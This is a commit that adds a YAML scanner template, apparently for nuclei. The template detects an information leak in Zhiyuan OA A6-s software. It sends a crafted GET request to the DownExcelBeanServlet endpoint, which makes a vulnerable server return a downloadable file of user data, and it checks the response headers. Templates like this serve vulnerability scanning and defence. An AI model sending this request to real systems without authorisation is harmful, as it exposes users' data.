Create zhiyuan-oa-info-leak.yaml

patch-1
PikPikcU 2021-02-24 08:07:57 +00:00 committed by GitHub
parent b86a406d26
commit 2f39160e65
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions

View File

@ -0,0 +1,26 @@
id: zhiyuan-oa-info-leak
info:
name: Zhiyuan Oa A6-s info Leak
author: pikpikcu
severity: info
reference: https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md
tags: zhiyuan,leak,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0"
matchers-condition: and
matchers:
- type: word
words:
- "Content-disposition: attachment;filename="
- "Content-Type: application/x-msdownload"
part: header
- type: status
status:
- 200